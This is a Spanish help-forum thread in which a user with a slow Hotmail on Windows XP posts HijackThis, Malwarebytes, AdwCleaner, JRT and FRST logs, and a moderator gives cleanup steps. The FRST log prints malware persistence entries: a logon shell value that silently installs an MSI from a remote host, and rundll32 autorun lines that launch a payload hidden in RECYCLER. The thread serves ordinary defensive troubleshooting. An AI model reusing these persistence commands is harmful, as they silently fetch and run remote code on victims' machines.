• Registrarse
  • Iniciar sesión


  • Página 1 de 2 12 ÚltimoÚltimo
    Resultados 1 al 10 de 12

    Hotmail me va lentísimo

    Logfile of Trend Micro HijackThis v2.0.4 Scan saved at 2:41:35, on 19/04/2017 Platform: Windows XP SP2 (WinNT 5.01.2600) MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180) Boot mode: Normal Running processes: C:\WINDOWS\System32\smss.exe C:\WINDOWS\system32\winlogon.exe C:\WINDOWS\system32\services.exe C:\WINDOWS\system32\lsass.exe C:\WINDOWS\system32\Ati2evxx.exe C:\WINDOWS\system32\svchost.exe ...

    1. #1
      Usuario Avatar de migueltc78
      Registrado
      abr 2017
      Ubicación
      España
      Mensajes
      8

      Hotmail me va lentísimo

      Logfile of Trend Micro HijackThis v2.0.4
      Scan saved at 2:41:35, on 19/04/2017
      Platform: Windows XP SP2 (WinNT 5.01.2600)
      MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)
      Boot mode: Normal

      Running processes:
      C:\WINDOWS\System32\smss.exe
      C:\WINDOWS\system32\winlogon.exe
      C:\WINDOWS\system32\services.exe
      C:\WINDOWS\system32\lsass.exe
      C:\WINDOWS\system32\Ati2evxx.exe
      C:\WINDOWS\system32\svchost.exe
      C:\WINDOWS\system32\Ati2evxx.exe
      C:\WINDOWS\System32\svchost.exe
      C:\WINDOWS\system32\svchost.exe
      C:\WINDOWS\system32\spoolsv.exe
      C:\Archivos de programa\Archivos comunes\Apple\Mobile Device Support\AppleMobileDeviceService.exe
      C:\WINDOWS\Explorer.EXE
      C:\Archivos de programa\Bonjour\mDNSResponder.exe
      C:\Archivos de programa\Canon\IJPLM\IJPLMSVC.EXE
      C:\Archivos de programa\Archivos comunes\Logishrd\LVMVFM\LVPrcSrv.exe
      C:\Archivos de programa\ScreenShot\SSSvc.exe
      C:\WINDOWS\system32\svchost.exe
      C:\Archivos de programa\Archivos comunes\InstallShield\UpdateService\issch.exe
      C:\Archivos de programa\Canon\Solution Menu EX\CNSEMAIN.EXE
      C:\Archivos de programa\Logitech\LWS\Webcam Software\LWS.exe
      C:\Archivos de programa\Logitech\LWS\Webcam Software\CameraHelperShell.exe
      C:\WINDOWS\RTHDCPL.EXE
      C:\Archivos de programa\iTunes\iTunesHelper.exe
      C:\WINDOWS\system32\ctfmon.exe
      C:\Archivos de programa\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
      C:\Archivos de programa\Archivos comunes\Logishrd\LQCVFX\COCIManager.exe
      C:\Archivos de programa\WinZip\WZQKPICK.EXE
      C:\WINDOWS\system32\wscntfy.exe
      C:\Archivos de programa\Microsoft Office\Office\OSA.EXE
      C:\Archivos de programa\ATI Technologies\ATI.ACE\Core-Static\ccc.exe
      C:\Archivos de programa\Google\Chrome\Application\chrome.exe
      C:\Archivos de programa\Google\Chrome\Application\chrome.exe
      C:\Archivos de programa\iPod\bin\iPodService.exe
      C:\Archivos de programa\Google\Chrome\Application\chrome.exe
      C:\Archivos de programa\Google\Chrome\Application\chrome.exe
      C:\Archivos de programa\Google\Chrome\Application\chrome.exe
      I:\Trabajo\Antivirus\HijackThis.exe

      R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = www.google.com
      R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.google.com
      R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = *.local
      R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Vínculos
      O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Archivos de programa\Archivos comunes\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
      O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - C:\Archivos de programa\Google\Google Toolbar\GoogleToolbar_32.dll
      O3 - Toolbar: Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Archivos de programa\Google\Google Toolbar\GoogleToolbar_32.dll
      O4 - HKLM\..\Run: [ISUSPM Startup] C:\ARCHIV~1\ARCHIV~1\INSTAL~1\UPDATE~1\isuspm.exe -startup
      O4 - HKLM\..\Run: [ISUSScheduler] "C:\Archivos de programa\Archivos comunes\InstallShield\UpdateService\issch.exe" -start
      O4 - HKLM\..\Run: [CanonSolutionMenuEx] C:\Archivos de programa\Canon\Solution Menu EX\CNSEMAIN.EXE /logon
      O4 - HKLM\..\Run: [LWS] C:\Archivos de programa\Logitech\LWS\Webcam Software\LWS.exe -hide
      O4 - HKLM\..\Run: [NeroCheck] C:\WINDOWS\system32\NeroCheck.exe
      O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Archivos de programa\Adobe\Reader 9.0\Reader\Reader_sl.exe"
      O4 - HKLM\..\Run: [Adobe ARM] "C:\Archivos de programa\Archivos comunes\Adobe\ARM\1.0\AdobeARM.exe"
      O4 - HKLM\..\Run: [RTHDCPL] RTHDCPL.EXE
      O4 - HKLM\..\Run: [DivXMediaServer] C:\Archivos de programa\DivX\DivX Media Server\DivXMediaServer.exe
      O4 - HKLM\..\Run: [iTunesHelper] "C:\Archivos de programa\iTunes\iTunesHelper.exe"
      O4 - HKLM\..\Run: [StartCCC] "C:\Archivos de programa\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" MSRun
      O4 - HKLM\..\Run: [BrowserPlugInHelper] C:\Archivos de programa\Wondershare\VideoConverterFree\BrowserPlugInHelper.exe
      O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\ctfmon.exe
      O4 - HKCU\..\Run: [swg] "C:\Archivos de programa\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe"
      O4 - HKCU\..\Run: [ByteFence] "C:\Archivos de programa\ByteFence\ByteFence.exe" /a
      O4 - HKUS\S-1-5-19\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SERVICIO LOCAL')
      O4 - HKUS\S-1-5-20\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Servicio de red')
      O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SYSTEM')
      O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Default user')
      O4 - S-1-5-18 Startup: Búsqueda rápida de Microsoft.lnk = C:\Archivos de programa\Microsoft Office\Office\FINDFAST.EXE (User 'SYSTEM')
      O4 - S-1-5-18 Startup: Inicio de Office.lnk = C:\Archivos de programa\Microsoft Office\Office\OSA.EXE (User 'SYSTEM')
      O4 - .DEFAULT Startup: Búsqueda rápida de Microsoft.lnk = C:\Archivos de programa\Microsoft Office\Office\FINDFAST.EXE (User 'Default user')
      O4 - .DEFAULT Startup: Inicio de Office.lnk = C:\Archivos de programa\Microsoft Office\Office\OSA.EXE (User 'Default user')
      O4 - Startup: Búsqueda rápida de Microsoft.lnk = C:\Archivos de programa\Microsoft Office\Office\FINDFAST.EXE
      O4 - Startup: Inicio de Office.lnk = C:\Archivos de programa\Microsoft Office\Office\OSA.EXE
      O4 - Global Startup: Adobe Gamma Loader.lnk = C:\Archivos de programa\Archivos comunes\Adobe\Calibration\Adobe Gamma Loader.exe
      O4 - Global Startup: WinZip Quick Pick.lnk = C:\Archivos de programa\WinZip\WZQKPICK.EXE
      O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Archivos de programa\Messenger\msmsgs.exe
      O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Archivos de programa\Messenger\msmsgs.exe
      O22 - SharedTaskScheduler: Precargador Browseui - {438755C2-A8BA-11D1-B96B-00A0C90312E1} - C:\WINDOWS\system32\browseui.dll
      O22 - SharedTaskScheduler: Demonio de caché de las categorías de componente - {8C7461EF-2B13-11d2-BE35-3078302C2030} - C:\WINDOWS\system32\browseui.dll
      O23 - Service: Apple Mobile Device - Apple Inc. - C:\Archivos de programa\Archivos comunes\Apple\Mobile Device Support\AppleMobileDeviceService.exe
      O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - C:\WINDOWS\system32\Ati2evxx.exe
      O23 - Service: Servicio Bonjour (Bonjour Service) - Apple Inc. - C:\Archivos de programa\Bonjour\mDNSResponder.exe
      O23 - Service: Servicio del administrador de discos lógicos (dmadmin) - Unknown owner - C:\WINDOWS\System32\dmadmin.exe
      O23 - Service: Registro de sucesos (Eventlog) - Unknown owner - C:\WINDOWS\system32\services.exe
      O23 - Service: Servicio Google Update (gupdate) (gupdate) - Unknown owner - C:\Archivos de programa\Google\Update\GoogleUpdate.exe
      O23 - Service: Servicio de Google Update (gupdatem) (gupdatem) - Unknown owner - C:\Archivos de programa\Google\Update\GoogleUpdate.exe
      O23 - Service: Google Software Updater (gusvc) - Google - C:\Archivos de programa\Google\Common\Google Updater\GoogleUpdaterService.exe
      O23 - Service: Canon Inkjet Printer/Scanner/Fax Extended Survey Program (IJPLMSVC) - Unknown owner - C:\Archivos de programa\Canon\IJPLM\IJPLMSVC.EXE
      O23 - Service: Servicio COM de grabación de CD de IMAPI (ImapiService) - Unknown owner - C:\WINDOWS\system32\imapi.exe
      O23 - Service: Servicio del iPod (iPod Service) - Apple Inc. - C:\Archivos de programa\iPod\bin\iPodService.exe
      O23 - Service: Process Monitor (LVPrcSrv) - Logitech Inc. - C:\Archivos de programa\Archivos comunes\Logishrd\LVMVFM\LVPrcSrv.exe
      O23 - Service: Escritorio remoto compartido de NetMeeting (mnmsrvc) - Unknown owner - C:\WINDOWS\system32\mnmsrvc.exe
      O23 - Service: Plug and Play (PlugPlay) - Unknown owner - C:\WINDOWS\system32\services.exe
      O23 - Service: Administrador de sesión de Ayuda de escritorio remoto (RDSessMgr) - Unknown owner - C:\WINDOWS\system32\sessmgr.exe
      O23 - Service: Remote Packet Capture Protocol v.0 (experimental) (rpcapd) - CACE Technologies, Inc. - C:\Archivos de programa\WinPcap\rpcapd.exe
      O23 - Service: Tarjeta inteligente (SCardSvr) - Unknown owner - C:\WINDOWS\System32\SCardSvr.exe
      O23 - Service: SSSvc - Filseclab Corporation Limited - C:\Archivos de programa\ScreenShot\SSSvc.exe
      O23 - Service: Registros y alertas de rendimiento (SysmonLog) - Unknown owner - C:\WINDOWS\system32\smlogsvc.exe
      O23 - Service: Instantáneas de volumen (VSS) - Unknown owner - C:\WINDOWS\System32\vssvc.exe
      O23 - Service: Adaptador de rendimiento de WMI (WmiApSrv) - Unknown owner - C:\WINDOWS\system32\wbem\wmiapsrv.exe
      O23 - Service: Servicio de uso compartido de red del Reproductor de Windows Media (WMPNetworkSvc) - Unknown owner - C:\Archivos de programa\Windows Media Player\WMPNetwk.exe

      --
      End of file - 8810 bytes

    2. #2
      Moderador Gral.
      Avatar de @Javier_HF
      Registrado
      jun 2006
      Ubicación
      Spain.
      Mensajes
      21.475

      Re: Hotmail me va lentísimo

      Buenas migueltc78. al Foro.

      Temas que interesa revisar y leer :

      Consejos para antes de publicar un nuevo mensaje.

      Políticas del Foro de InfoSpyware.

      Políticas Foro Oficial de HijackThis en español.

      ¿Cómo subir imágenes al Foro? *TUTORIAL*
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

      Solo te va lento Hotmail.??

      Tu equipo/sistema operativo tiene estas características :
      Platform: Windows XP SP2 (WinNT 5.01.2600)
      MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)
      Con esa version de Windows estas totalmente expuesto a tener un equipo con infecciones permanentes, por los fallos de seguridad que NO tienes actualizados.

      Aparte por supuesto que Windows XP, YA es un sistema operativo "muerto".

      Nos comentas.
      Quien no lo intenta no lo consigue | ;-)

      * Síguenos en nuestro Twitter y hazte nuestro amigo en Facebook.
      * Infórmate de las ultimas amenazas de la red desde: InfoSpyware Blog
      * No se resuelven dudas por Privados ni por E-mail, ya que para eso esta el foro.

    3. #3
      Usuario Avatar de migueltc78
      Registrado
      abr 2017
      Ubicación
      España
      Mensajes
      8

      Re: Hotmail me va lentísimo

      En efecto, sólo es hotmail. Véis algo raro en el reporte de hick jack this que pegué?

    4. #4
      Moderador Gral.
      Avatar de @Javier_HF
      Registrado
      jun 2006
      Ubicación
      Spain.
      Mensajes
      21.475

      Re: Hotmail me va lentísimo

      SI estas infectado y ahora para revisar tu maquina, sigue estos pasos, en el orden indicado y leyendo todo lo explicado.

      Paso 1.- Desactiva temporalmente el Antivirus >> Cómo deshabilitar temporalmente su Antivirus, mientras realizamos TODOS los pasos.

      Vamos a descargar en TU ESCRITORIO(y NO en otro lugar ) todas las herramientas que vamos a utilizar en este procedimiento (pero no las ejecutes todavía) :


      Una vez descargadas, desconectas tu equipo de Internet(apaga el router) << Muy Importante, y Cierras también cualquier otro programa que tengas abierto.

      Paso 2.- Ejecutas las herramientas de una en una y en el orden indicado :

      Si usas Windows Vista/7/8 o 10, presiona clic derecho y seleccionas "Ejecutar como Administrador") para Todos los programas.
      CCleaner.-
      • Instalas y Ejecutas CCleaner siguiendo los pasos indicados en el manual.
      • Úsalo primero su opción de "Limpiador" para borrar cookies, temporales de Internet y todos los archivos que te muestre como obsoletos.
      • Después usa su opción de "Registro" para limpiar todo el registro de Windows (haciendo copia de seguridad).

      Malwarebytes.-
      • Instalas y Ejecutas MBAM siguiendo los pasos indicados en el manual.
      • Realiza un Análisis Completo.
      • Seleccionando "TODOS a Cuarentena" para enviarlo a la cuarentena y Reinicias el sistema.
      • En el apartado del manual "Historial" encontrarás el informe del MBAM, que debes copiar y pegar en tu próxima respuesta, para analizarlo.

      AdwCleaner.-
      • Ejecuta Adwcleaner.exe.
      • Pulsar en el botón Escanear, y espera a que se realice el proceso, inmediatamente pulsa sobre el botón Limpiar.
      • Espera a que se complete y sigue las instrucciones, si te pidiera Reiniciar el sistema Aceptas.
      • Guardas el reporte que te aparecerá, para copiarlo y pegarlo en tu próxima respuesta.
      • El informe también se puede encontrar en "C:\Program Files(x86)\AdwCleaner\AdwCleaner[C1].txt"

      Junkware Removal Tool.-
      • Ejecuta JRT.exe.
      • Y pulsar cualquier tecla para continuar, esperar pacientemente a que termine el proceso.
      • Si en algún momento te pide Reiniciar hazlo.
      • Al finalizar, un registro/informe (JRT.txt) se guardara en el escritorio y se abrirá automáticamente.
      • Copia y pega el contenido de JRT.txt en tu próxima respuesta.

      Farbar Recovery Scan Tool.-
      • Ejecuta FRST.exe.
      • En el mensaje de la ventana del Disclaimer, pulsamos Yes.
      • En la ventana principal pulsamos en el botón Scan y esperamos a que concluya el análisis.
      • Se abrirán dos(2) archivos(Logs), Frst.txt y Addition.txt, estos quedaran grabados en el escritorio.

      Paso 3.- Poner los informes en tu próxima respuesta de :

      • Malwarebytes, AdwCleaner, JRT, FRST + Addition.txt, y en ese orden.


      Debes copiarlos y pegarlos con todo su contenido y usaras varios mensajes si recibes un mensaje de error indicando que es muy largo.

      - Y nos cuentas como funciona tu equipo, en relación al problema planteado.

      Saludos.
      Quien no lo intenta no lo consigue | ;-)

      * Síguenos en nuestro Twitter y hazte nuestro amigo en Facebook.
      * Infórmate de las ultimas amenazas de la red desde: InfoSpyware Blog
      * No se resuelven dudas por Privados ni por E-mail, ya que para eso esta el foro.

    5. #5
      Usuario Avatar de migueltc78
      Registrado
      abr 2017
      Ubicación
      España
      Mensajes
      8
      Malwarebytes Anti-Malware
      www.malwarebytes.org


      Error, 20/04/2017 11:49:20, SYSTEM, MIGUEL, Update, Bad md5 or size: domains, 11,
      Error, 20/04/2017 11:49:20, SYSTEM, MIGUEL, Update, Bad md5 or size: ips, 11,
      Update, 20/04/2017 11:49:20, SYSTEM, MIGUEL, Manual, Remediation Database, 2015.9.16.1, 2017.4.3.1,
      Update, 20/04/2017 11:49:20, SYSTEM, MIGUEL, Manual, Rootkit Database, 2015.9.18.1, 2017.4.2.1,
      Update, 20/04/2017 11:49:20, SYSTEM, MIGUEL, Manual, IP Database, 2015.9.21.2, 2017.4.19.2,
      Update, 20/04/2017 11:49:23, SYSTEM, MIGUEL, Manual, Domain Database, 2015.9.22.3, 2017.4.19.10,
      Update, 20/04/2017 11:49:25, SYSTEM, MIGUEL, Manual, Malware Database, 2015.9.22.5, 2017.4.20.3,
      Error, 20/04/2017 11:56:03, SYSTEM, MIGUEL, Protection, IsLicensed, 13,
      Protection, 20/04/2017 11:56:03, SYSTEM, MIGUEL, Protection, Malware Protection, Stopping,
      Protection, 20/04/2017 11:56:03, SYSTEM, MIGUEL, Protection, Malware Protection, Stopped,
      Scan, 20/04/2017 12:13:22, SYSTEM, MIGUEL, Manual, Inicio:20/04/2017 12:01:05, Duración:9 min, 47 seg, Análisis de amenazas, Completado, Detecciones de malware de 0, Detección de códigos no de malware de 1,
      Error, 20/04/2017 12:14:09, SYSTEM, MIGUEL, Protection, IsLicensed, 13,
      Protection, 20/04/2017 12:14:09, SYSTEM, MIGUEL, Protection, Malware Protection, Stopping,
      Protection, 20/04/2017 12:14:09, SYSTEM, MIGUEL, Protection, Malware Protection, Stopped,

      (end)

      # AdwCleaner v6.044 - Archivo de registro creado 20/04/2017 en 11:51:34
      # Actualizado en 28/02/2017 por Malwarebytes
      # Base de datos : 2017-02-28.2 [Local]
      # Sistema Operativo : Microsoft Windows XP Service Pack 2 (X86)
      # Nombre de usuario : MiguelTC - MIGUEL
      # Ejecutado desde : C:\Documents and Settings\MiguelTC\Escritorio\AdwCleaner.exe
      # Modo: Limpiar
      # Soporte : https://www.malwarebytes.com/support



      ***** [ Servicios ] *****



      ***** [ Carpetas ] *****

      [-] Carpeta eliminada: C:\Documents and Settings\All Users\Datos de programa\{B96EB44A-7860-4F13-BC9A-0A73CA5F11C2}


      ***** [ Archivos ] *****

      [-] Archivo eliminado: C:\Documents and Settings\All Users\Menú Inicio\ScreenShot.lnk


      ***** [ DLL ] *****



      ***** [ WMI ] *****



      ***** [ Accesos directos ] *****



      ***** [ Tareas programadas ] *****



      ***** [ Registro ] *****

      [-] Llave eliminada: HKLM\SOFTWARE\Classes\protector_dll.Protector
      [-] Llave eliminada: HKLM\SOFTWARE\Classes\protector_dll.Protector.1
      [-] Llave eliminada: HKLM\SOFTWARE\Classes\protector_dll.ProtectorBho
      [-] Llave eliminada: HKLM\SOFTWARE\Classes\protector_dll.ProtectorBho.1
      [-] Llave eliminada: HKLM\SOFTWARE\Classes\protector_dll.ProtectorLib
      [-] Llave eliminada: HKLM\SOFTWARE\Classes\protector_dll.ProtectorLib.1
      [-] Llave eliminada: HKU\S-1-5-21-725345543-706699826-2147250837-1004\Software\Vittalia
      [-] Llave eliminada: HKU\S-1-5-21-725345543-706699826-2147250837-1004-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Vittalia
      [#] Llave eliminada al reiniciar: HKCU\Software\Vittalia
      [-] Llave eliminada: HKLM\SOFTWARE\Uniblue
      [-] Llave eliminada: HKLM\SOFTWARE\ScreenShot
      [-] Llave eliminada: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ScreenShot
      [-] Llave eliminada: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Management\ARPCache\ByteFence
      [-] Llave eliminada: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Management\ARPCache\ScreenShot
      [-] Llave eliminada: HKLM\SOFTWARE\Classes\*\shell\ByteFence File Scan


      ***** [ Navegadores ] *****



      *************************

      :: Llaves "Tracing" eliminadas
      :: Se han borrado los ajustes de Winsock

      *************************

      C:\AdwCleaner\AdwCleaner[C0].txt - [2222 Bytes] - [20/04/2017 11:51:34]
      C:\AdwCleaner\AdwCleaner[S0].txt - [2571 Bytes] - [20/04/2017 11:51:00]

      ########## EOF - C:\AdwCleaner\AdwCleaner[C0].txt - [2368 Bytes] ##########

      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      Junkware Removal Tool (JRT) by Malwarebytes
      Version: 8.1.3 (04.10.2017)
      Operating System: Microsoft Windows XP x86
      Ran by MiguelTC (Administrator) on 20/04/2017 at 11:56:53,71
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




      File System: 2

      Successfully deleted: C:\Documents and Settings\MiguelTC\Datos de programa\pro pc cleaner (Folder)
      Successfully deleted: C:\WINDOWS\wininit.ini (File)



      Registry: 4

      Successfully deleted: HKLM\Software\Microsoft\Windows\CurrentVersion\Run\\BrowserPlugInHelper (Registry Value)
      Successfully deleted: HKLM\SYSTEM\CurrentControlSet\services\SSSvc (Registry Key)
      Successfully deleted: HKCU\Software\Microsoft\Internet Explorer\Search\\SearchAssistant (Registry Value)
      Successfully deleted: HKLM\Software\Microsoft\Internet Explorer\Search\\SearchAssistant (Registry Value)




      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      Scan was completed on 20/04/2017 at 11:57:38,29
      End of JRT log
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    6. #6
      Usuario Avatar de migueltc78
      Registrado
      abr 2017
      Ubicación
      España
      Mensajes
      8

      Re: Hotmail me va lentísimo

      Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 19-04-2017
      Ran by MiguelTC (administrator) on MIGUEL (20-04-2017 12:58:52)
      Running from C:\Documents and Settings\MiguelTC\Escritorio
      Loaded Profiles: MiguelTC (Available Profiles: MiguelTC)
      Platform: Microsoft Windows XP Home Edition Service Pack 2 (X86) Language: Español (alfabetización internacional)
      Internet Explorer Version 6 (Default browser: Chrome)
      Boot Mode: Normal
      Tutorial for Farbar Recovery Scan Tool: ***********************************************************************************************************

      ==================== Processes (Whitelisted) =================

      (If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

      (ATI Technologies Inc.) C:\WINDOWS\system32\ati2evxx.exe
      (ATI Technologies Inc.) C:\WINDOWS\system32\ati2evxx.exe
      (Apple Inc.) C:\Archivos de programa\Archivos comunes\Apple\Mobile Device Support\AppleMobileDeviceService.exe
      (Apple Inc.) C:\Archivos de programa\Bonjour\mDNSResponder.exe
      () C:\Archivos de programa\Canon\IJPLM\ijplmsvc.exe
      (Logitech Inc.) C:\Archivos de programa\Archivos comunes\LogiShrd\LVMVFM\LVPrcSrv.exe
      (Microsoft Corporation) C:\WINDOWS\system32\msiexec.exe
      (Microsoft Corporation) C:\WINDOWS\system32\wscntfy.exe
      (InstallShield Software Corporation) C:\Archivos de programa\Archivos comunes\InstallShield\UpdateService\issch.exe
      (CANON INC.) C:\Archivos de programa\Canon\Solution Menu EX\CNSEMAIN.EXE
      (Logitech Inc.) C:\Archivos de programa\Logitech\LWS\Webcam Software\LWS.exe
      (Adobe Systems Incorporated) C:\Archivos de programa\Adobe\Reader 9.0\Reader\reader_sl.exe
      (Realtek Semiconductor Corp.) C:\WINDOWS\RTHDCPL.EXE
      (Apple Inc.) C:\Archivos de programa\iTunes\iTunesHelper.exe
      () C:\Archivos de programa\Logitech\LWS\Webcam Software\CameraHelperShell.exe
      (Advanced Micro Devices Inc.) C:\Archivos de programa\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
      () C:\Archivos de programa\Archivos comunes\LogiShrd\LQCVFX\COCIManager.exe
      (WinZip Computing, S.L.) C:\Archivos de programa\WinZip\WZQKPICK.EXE
      (ATI Technologies Inc.) C:\Archivos de programa\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
      () C:\Archivos de programa\Microsoft Office\Office\OSA.EXE
      (Apple Inc.) C:\Archivos de programa\iPod\bin\iPodService.exe

      ==================== Registry (Whitelisted) ====================

      (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

      HKLM\...\Run: [ISUSPM Startup] => C:\Archivos de programa\Archivos comunes\InstallShield\UpdateService\ISUSPM.exe [196608 2004-04-17] (InstallShield Software Corporation)
      HKLM\...\Run: [ISUSScheduler] => C:\Archivos de programa\Archivos comunes\InstallShield\UpdateService\issch.exe [69632 2004-04-13] (InstallShield Software Corporation)
      HKLM\...\Run: [CanonSolutionMenuEx] => C:\Archivos de programa\Canon\Solution Menu EX\CNSEMAIN.EXE [1185112 2010-04-02] (CANON INC.)
      HKLM\...\Run: [LWS] => C:\Archivos de programa\Logitech\LWS\Webcam Software\LWS.exe [165208 2010-05-07] (Logitech Inc.)
      HKLM\...\Run: [NeroCheck] => C:\WINDOWS\system32\NeroCheck.exe [155648 2001-07-09] (Ahead Software Gmbh)
      HKLM\...\Run: [Adobe Reader Speed Launcher] => C:\Archivos de programa\Adobe\Reader 9.0\Reader\Reader_sl.exe [35696 2009-10-03] (Adobe Systems Incorporated)
      HKLM\...\Run: [Adobe ARM] => C:\Archivos de programa\Archivos comunes\Adobe\ARM\1.0\AdobeARM.exe [935288 2009-09-04] (Adobe Systems Incorporated)
      HKLM\...\Run: [RTHDCPL] => C:\WINDOWS\RTHDCPL.EXE [20053608 2011-06-24] (Realtek Semiconductor Corp.)
      HKLM\...\Run: [DivXMediaServer] => C:\Archivos de programa\DivX\DivX Media Server\DivXMediaServer.exe
      HKLM\...\Run: [iTunesHelper] => C:\Archivos de programa\iTunes\iTunesHelper.exe [152392 2014-02-21] (Apple Inc.)
      HKLM\...\Run: [StartCCC] => C:\Archivos de programa\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [98304 2011-03-09] (Advanced Micro Devices, Inc.)
      Winlogon\Notify\AtiExtEvent: C:\WINDOWS\system32\Ati2evxx.dll [2011-03-09] (ATI Technologies Inc.)
      HKU\S-1-5-21-725345543-706699826-2147250837-1004\...\Run: [swg] => C:\Archivos de programa\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [39408 2016-01-06] (Google Inc.)
      HKU\S-1-5-21-725345543-706699826-2147250837-1004\...\Run: [ByteFence] => "C:\Archivos de programa\ByteFence\ByteFence.exe" /a
      HKU\S-1-5-21-725345543-706699826-2147250837-1004\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?dat...RXRjzLNYF2OF== /q
      HKU\S-1-5-21-725345543-706699826-2147250837-1004\...\MountPoints2: {6e68a7ba-c417-11e5-a581-60e32738ff92} - C:\WINDOWS\system32\RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL RuNdLl32.EXE .\RECYCLER\S-5-3-42-2819952290-8240758988-879315005-3665\jwgkvsq.vmx,ahaezedrn
      HKU\S-1-5-21-725345543-706699826-2147250837-1004\...\MountPoints2: {a68d7a2f-e3a8-11e5-a5c0-60e32738ff92} - C:\WINDOWS\system32\RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL RUNdLl32.ExE .\RECYCLER\S-5-3-42-2819952290-8240758988-879315005-3665\jwgkvsq.vmx,ahaezedrn
      HKU\S-1-5-21-725345543-706699826-2147250837-1004\...\MountPoints2: {d524c8a7-1bc5-11e6-a612-5404a69b8782} - C:\WINDOWS\system32\RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL RuNdLl32.EXE .\RECYCLER\S-5-3-42-2819952290-8240758988-879315005-3665\jwgkvsq.vmx,ahaezedrn
      HKU\S-1-5-21-725345543-706699826-2147250837-1004\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\WINDOWS\PHOTO!~1.scr [3939328 2008-09-15] (VicMan Software)
      IFEO\DisplaySwitch.exe: [Debugger]
      IFEO\taskmgr.exe: [Debugger]
      Startup: C:\Documents and Settings\All Users\Menú Inicio\Programas\Inicio\Adobe Gamma Loader.lnk [2016-01-22]
      ShortcutTarget: Adobe Gamma Loader.lnk -> C:\Archivos de programa\Archivos comunes\Adobe\Calibration\Adobe Gamma Loader.exe (Adobe Systems, Inc.)
      Startup: C:\Documents and Settings\All Users\Menú Inicio\Programas\Inicio\WinZip Quick Pick.lnk [2016-01-20]
      ShortcutTarget: WinZip Quick Pick.lnk -> C:\Archivos de programa\WinZip\WZQKPICK.EXE (WinZip Computing, S.L.)
      Startup: C:\Documents and Settings\MiguelTC\Menú Inicio\Programas\Inicio\Búsqueda rápida de Microsoft.lnk [2016-01-06]
      ShortcutTarget: Búsqueda rápida de Microsoft.lnk -> C:\Archivos de programa\Microsoft Office\Office\FINDFAST.EXE (Microsoft Corporation)
      Startup: C:\Documents and Settings\MiguelTC\Menú Inicio\Programas\Inicio\Inicio de Office.lnk [2016-01-06]
      ShortcutTarget: Inicio de Office.lnk -> C:\Archivos de programa\Microsoft Office\Office\OSA.EXE ()
      BootExecute: autocheck autochk * sdnclean.exe

      ==================== Internet (Whitelisted) ====================

      (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

      Winsock: Catalog5 04 C:\Archivos de programa\Bonjour\mdnsNSP.dll [121704 2011-08-31] (Apple Inc.)
      Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt

      Internet Explorer:
      ==================
      HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = Google
      HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
      HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&pver=6&ar=msnhome
      HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.google.com/ie
      HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = %SystemRoot%\system32\blank.htm
